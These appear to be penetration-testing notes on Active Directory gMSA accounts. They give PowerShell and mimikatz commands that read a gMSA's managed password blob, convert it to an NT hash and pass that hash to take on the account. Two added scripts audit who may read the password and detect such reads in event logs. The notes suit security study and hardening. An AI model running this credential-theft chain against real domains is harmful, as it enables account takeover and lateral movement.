gmsa

Group Managed Service Accounts (gMSAs) provide password management, automatic password rotation (every 30 days by default), management of SPNs and delegated administration for service accounts. Because the password is long and random and rotated automatically, gMSAs also help protect against Kerberoast attacks.

A principal that is explicitly allowed to do so can read the gMSA password from the msDS-ManagedPassword attribute (stored in binary form as an MSDS-MANAGEDPASSWORD_BLOB). The permission must be granted explicitly; not even Domain Admins can read this attribute by default.

PowerShell

Find managed service accounts (PowerView, then ADModule)

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'

Get-ADServiceAccount -Filter *

Get the principals that can read the msDS-ManagedPassword attribute using ADModule

Get-ADServiceAccount -Identity gmsa_account -Properties * | select PrincipalsAllowedToRetrieveManagedPassword
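Added example, not part of the original notes: the same check run across every gMSA in the domain rather than a single account, expanding group principals to their members and flagging broad groups. It assumes the ActiveDirectory module (RSAT) is loaded and that the domain uses the default English group names listed in $BroadPrincipals; the function name Get-GmsaPasswordReaders is made up for this example.

```powershell
# Added example (not from the original notes): list, for every gMSA, who is allowed to
# retrieve the managed password, and flag principals that are too broad to be safe.
Import-Module ActiveDirectory

# Assumed default group names. If any of these can retrieve the password, every member can
# compute the gMSA's NT hash, which defeats the point of having a managed password.
$BroadPrincipals = @('Domain Users', 'Domain Computers')

function Get-GmsaPasswordReaders {
    # One row per (gMSA, allowed principal); group membership is expanded recursively.
    $gmsas = Get-ADServiceAccount -Filter 'objectClass -eq "msDS-GroupManagedServiceAccount"' `
                 -Properties PrincipalsAllowedToRetrieveManagedPassword

    foreach ($g in $gmsas) {
        if (-not $g.PrincipalsAllowedToRetrieveManagedPassword) {
            # Nobody can retrieve the password: the account is effectively unusable but safe.
            [pscustomobject]@{ gMSA = $g.Name; Principal = '<none>'; Type = 'n/a'; Broad = $false; Members = '' }
            continue
        }

        foreach ($dn in $g.PrincipalsAllowedToRetrieveManagedPassword) {
            # The attribute holds distinguished names; resolve each to its object.
            $obj = Get-ADObject -Identity $dn -Properties sAMAccountName -ErrorAction SilentlyContinue
            if (-not $obj) {
                # Unresolvable entry (e.g. an orphaned SID): report the raw value for follow-up.
                [pscustomobject]@{ gMSA = $g.Name; Principal = $dn; Type = 'unresolved'; Broad = $false; Members = '' }
                continue
            }

            $members = ''
            if ($obj.ObjectClass -eq 'group') {
                # Expand nested membership so the real set of readers is visible.
                $members = (Get-ADGroupMember -Identity $dn -Recursive |
                            Select-Object -ExpandProperty sAMAccountName) -join ', '
            }

            [pscustomobject]@{
                gMSA      = $g.Name
                Principal = $obj.sAMAccountName
                Type      = $obj.ObjectClass
                Broad     = $BroadPrincipals -contains $obj.Name
                Members   = $members
            }
        }
    }
}

# Broad entries first; anything with Broad = True should be reduced to the specific hosts
# that actually run the service.
Get-GmsaPasswordReaders | Sort-Object Broad -Descending | Format-Table -AutoSize
```

The expected result for a well-configured gMSA is a short list of computer accounts (or a group containing only those computers). A user account or a large group in the Principal column is exactly what the attack steps below look for, so it is the first thing to fix.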

Read the blob

Once we have compromised a principal that can read the blob, use ADModule to read it and DSInternals to compute the NTLM hash:

$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'

Convert the password to an NTLM hash using DSInternals: https://github.com/MichaelGrafnetter/DSInternals/releases

Import-Module \DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

Passing the NTLM hash of the gMSA (here with mimikatz), we get the privileges of the gMSA.

sekurlsa::pth /user:jumpone /domain:us.techcorp.local /ntlm:0a02c684cc0fa1744195edd1aec43078
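Added example, not part of the original notes: a detection-side counterpart to the steps above. Reading msDS-ManagedPassword is a directory read, so with "Audit Directory Service Access" enabled on the domain controllers and a SACL on the gMSA objects (or the Managed Service Accounts container) auditing Read Property, each read produces Security event 4662 whose Properties field lists the attribute's schemaIDGUID. The script resolves that GUID from the schema at runtime instead of hard-coding it and returns who read the attribute and when. It assumes the ActiveDirectory module, Event Log Readers rights on the DC, and that the auditing above is already in place; Get-GmsaPasswordReadEvents is a name made up for this example.

```powershell
# Added example (not from the original notes): surface 4662 events that record a read of
# msDS-ManagedPassword, so unexpected readers of a gMSA password can be spotted.
Import-Module ActiveDirectory

# Look up the attribute's schemaIDGUID; 4662 "Properties" identifies attributes by this GUID.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$attr     = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=msDS-ManagedPassword)' `
                         -Properties schemaIDGUID
$attrGuid = ([guid]$attr.schemaIDGUID).Guid

function Get-GmsaPasswordReadEvents {
    param(
        [datetime]$Since        = (Get-Date).AddDays(-1),   # how far back to search
        [string]  $ComputerName = $env:COMPUTERNAME         # a domain controller
    )

    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = $Since }

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        # 4662 is noisy; keep only events whose accessed properties include our attribute GUID.
        Where-Object { $_.Message -match [regex]::Escape($attrGuid) } |
        ForEach-Object {
            # Pull the EventData fields out of the event XML by name.
            $xml = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

            [pscustomobject]@{
                Time       = $_.TimeCreated
                Subject    = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Object     = $d.ObjectName      # the gMSA object that was read
                AccessMask = $d.AccessMask      # 0x10 = Read Property
                DC         = $ComputerName
            }
        }
}

# Group by reader: the legitimate readers are the computer accounts allowed to retrieve the
# password (they poll it regularly); any other subject deserves a closer look.
Get-GmsaPasswordReadEvents | Group-Object Subject |
    Select-Object Count, Name, @{ n = 'LastSeen'; e = { ($_.Group | Sort-Object Time)[-1].Time } } |
    Sort-Object Count
```

Compare the Subject column against the output of the PrincipalsAllowedToRetrieveManagedPassword check earlier on this page: a host that is allowed to read the password will show up on a steady schedule, whereas a one-off read by a user account is the pattern the attack chain above produces.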
